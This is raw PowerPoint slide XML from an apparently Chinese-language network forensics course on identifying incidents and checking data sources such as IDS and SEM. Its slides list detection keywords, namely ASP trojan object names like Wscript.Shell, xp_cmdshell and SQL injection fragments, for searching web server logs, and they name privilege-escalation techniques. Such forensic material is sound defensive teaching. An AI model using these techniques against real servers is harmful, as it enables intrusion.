              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Wscript.Shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shell.Application</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>adodb.stream</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Wscript.Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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所以可以用上面的对象名作为关键字，进行搜索，就有可能得到木马的文件名，再根据文件名分析日志文件可得出入侵者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>了。因为只有入侵者才知道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>木马存放的路径，也只有入侵者才会去访问该木马。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>辨认相关的事件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="843558"/>
            <a:ext cx="7272808" cy="2631490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>确定提升权限的方式</a:t>
            </a:r>
          </a:p>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常见的提升权限方法有以下几种方式：执行后台数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQLServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的扩展存储过程；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XP_CMDSHELL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>添加用户；上传密码捕获器监视</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的密码；利用其他漏洞获得管理员执行权限（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Server-U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞等）。例如，可以搜索以下关键字：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    %20and%20</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    Exec%20</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="771550"/>
            <a:ext cx="7272808" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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同一个事件可能被企业网络中的多个监控设备所察觉、记载，然而逐一地去检查这些数据源即不可行，也十分低效。分析人员通常从少数几个基本的数据源开始事件调查，例如显示所有传感器报警的入侵检测系统控制台，或者组织、固定很多其他数据源信息的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NFAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件。这种方法不仅高效，而且实际上对某些事件的关注正是由上面这些基本的数据源的报警引起的。</a:t>
            </a:r>
          </a:p>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在对每一个数据源逐一检查时，必须考虑其真实性。一般来说，相比那些接收规范后数据的数据源，分析人员更相信那些原始的数据源，而且，必须验证经过解释的数据，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的报警。目前还没有哪一个工具对恶意活动的辨认是完全准确的，它们要么把良性的活动报告成恶意活动，要么反之。如果不能处理一个连接中的所有数据包，这些工具就容易产生错误报警。验证过程应该基于附加的数据（例如原始数据包、其他数据源的支撑信息），以及对报警合法性的信息的回顾，还有使用该工具的经历。很多情况下，一个有经验的分析人员能够快速检查这些支持材料，以决定报警是否值得做更进一步的调查。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="771550"/>
            <a:ext cx="7272808" cy="1706880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一、数据源价值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在有多个不同的网络通信数据源的情况下，由于不同的数据源收集的信息不同，对于分析人员来说，不管是一般情形或是特殊情形，就具有不同的价值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>描述在网络取证中最常见数据源的典型价值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="771550"/>
            <a:ext cx="7272808" cy="2354491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的数据通常是检查可疑活动的切入点。通常情况下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不仅尝试着辨识所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议层上的恶意网络数据，而且也记录许多的数据字段（有时是一些原始数据包），这些数据在用来确认事件以及与其他数据源的数据相关联方面是有用的。但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>软件也会产生错误，所以应该检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>报警的有效性。判定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>报警的有效性能做到什么的程度，依赖于记录到的报警的数据量，以及可用的关于触发报警的规则特征或者异常检测方法的信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="771550"/>
            <a:ext cx="7272808" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
